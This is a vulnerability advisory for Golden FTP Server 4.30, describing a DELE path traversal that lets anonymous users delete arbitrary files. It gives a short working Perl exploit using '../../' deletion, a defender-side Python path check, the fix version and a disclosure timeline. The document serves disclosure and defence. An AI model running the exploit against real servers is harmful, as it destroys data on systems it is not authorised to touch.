Summary
Sarid Harper has discovered a vulnerability in Golden FTP Server, which can be exploited by malicious, anonymous individuals to delete arbitrary files.
The vulnerability is caused by an error in the way FTP “DELE” requests are handled. This can be exploited to escape the FTP root and delete arbitrary files on the affected system by using the “../” character sequence.
Successful exploitation of this vulnerability requires that the “Enable full control” option is enabled.
Affected Versions
This vulnerability is confirmed in the following versions:
- Golden FTP Server 4.30 Free
- Golden FTP Server 4.30 Professional
Other versions may also be affected.
Exploit Example
use strict;
use Net::FTP;
# Connect with Debug => 1 so the full FTP dialogue is printed
my $ftp = Net::FTP->new("192.168.1.35", Debug => 1) || die $@;
$ftp->login("anonymous", 'anonymous@local.host') || die $ftp->message;
# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd("/public/") || die $ftp->message;
# This deletes the file C:\bollocks.txt
$ftp->delete("../../bollocks.txt");
$ftp->quit;
$ftp = undef;
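The check the server is missing, shown defender-side as an added example (not Golden FTP Server's code): the DELE argument is resolved against the client's virtual directory, collapsed, and refused if it no longer lies inside the configured share. The share mapping (mirroring the advisory's C:\ftp\public root), the function names and the exception are assumptions.

```python
import posixpath
from pathlib import PureWindowsPath

# Constructed share table: virtual directory name -> local directory.
# Mirrors the advisory's setup, where /public/ is backed by C:\ftp\public.
SHARES = {"public": PureWindowsPath(r"C:\ftp\public")}


class PathEscape(Exception):
    """Raised when a DELE argument would resolve outside its share."""


def resolve_dele_target(cwd: str, arg: str) -> PureWindowsPath:
    """Map an FTP DELE argument to a local path, refusing share escapes.

    cwd: the client's current virtual directory, e.g. "/public/"
    arg: the DELE argument exactly as sent, e.g. "../../bollocks.txt"
    """
    # Treat backslashes as separators too, so "..\\..\\x" is not a bypass.
    raw = arg.replace("\\", "/")
    virtual = raw if raw.startswith("/") else posixpath.join(cwd, raw)
    # normpath collapses "." and ".." BEFORE the share lookup, so a
    # traversal like /public/../../bollocks.txt becomes /bollocks.txt.
    parts = [p for p in posixpath.normpath(virtual).split("/") if p]
    if not parts or parts[0] not in SHARES:
        raise PathEscape(f"{arg!r} does not resolve into a configured share")
    root, rest = SHARES[parts[0]], parts[1:]
    if not rest:
        raise PathEscape("DELE may not target the share root itself")
    local = root.joinpath(*rest)
    # Defence in depth: re-check on the local path, independent of normpath.
    if root not in local.parents:
        raise PathEscape(f"{arg!r} escapes {root}")
    return local


def dele_allowed(cwd: str, arg: str) -> bool:
    """Convenience wrapper: True if the request stays inside its share."""
    try:
        resolve_dele_target(cwd, arg)
        return True
    except PathEscape:
        return False


if __name__ == "__main__":
    # The advisory's request: must be refused, not mapped to C:\bollocks.txt.
    for req in ("../../bollocks.txt", "reports/old.txt", "sub/../report.txt"):
        print(f"DELE {req:<22} -> {'allowed' if dele_allowed('/public/', req) else 'refused'}")
```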
Resolution
Update to version 4.70 Free or Professional.
Time-line
- Vulnerability identified: 29.10.09
- Vendor informed: 11.11.09
- Vendor fix: 17.02.10
References
